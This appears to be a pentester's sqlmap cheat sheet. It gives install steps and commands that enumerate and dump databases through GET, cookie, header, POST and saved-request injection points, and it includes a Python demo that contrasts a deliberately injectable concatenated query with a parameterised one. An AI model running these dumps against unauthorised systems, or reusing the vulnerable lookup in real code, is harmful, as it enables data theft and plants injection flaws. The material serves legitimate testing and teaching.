Sqlmap
2017-11-28 19:00:01
Documentation
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. More here: http://sqlmap.org/
Installation
apt-get install -y sqlmap
Docker image with the tool pre-installed
https://hub.docker.com/r/szalek/pentest-tools/
docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools
Target
http://target.localhost/rest/ws-user-account.php?username=szalek
Sqlmap basic
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --dump
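Why an endpoint like the target above is exploitable, and what the fix looks like: an added example, not code from the original page or from the target application. It assumes a constructed in-memory SQLite stand-in for the site's users table; the vulnerable lookup builds the query by string concatenation, the safe one binds the username as a parameter.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the target's database: a "users" table with
    # made-up rows (assumption; the real schema is not on the page).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("szalek", "szalek@example.test", "hunter2"),
        ("admin", "admin@example.test", "s3cret"),
    ])
    return db


def lookup_vulnerable(db, username):
    # The parameter value becomes part of the SQL text, so a quote in the
    # input rewrites the WHERE clause. This is the flaw sqlmap's detection
    # engine probes for on ?username=.
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, username):
    # Parameterised query: the value is sent separately from the SQL text,
    # so it can only ever be compared as a literal string.
    sql = "SELECT username, email FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "szalek' OR '1'='1"
    print(lookup_vulnerable(db, probe))  # both rows: the condition became always-true
    print(lookup_safe(db, probe))        # []: no user has that literal name
```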
with cookie
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs
with header
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs
post (form data given inline)
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -T users --dump
post (from a saved request file)
login_request_dump.txt
POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1
email=admin&password=admin
sqlmap -r login_request_dump.txt -p email
sqlmap -r login_request_dump.txt -p password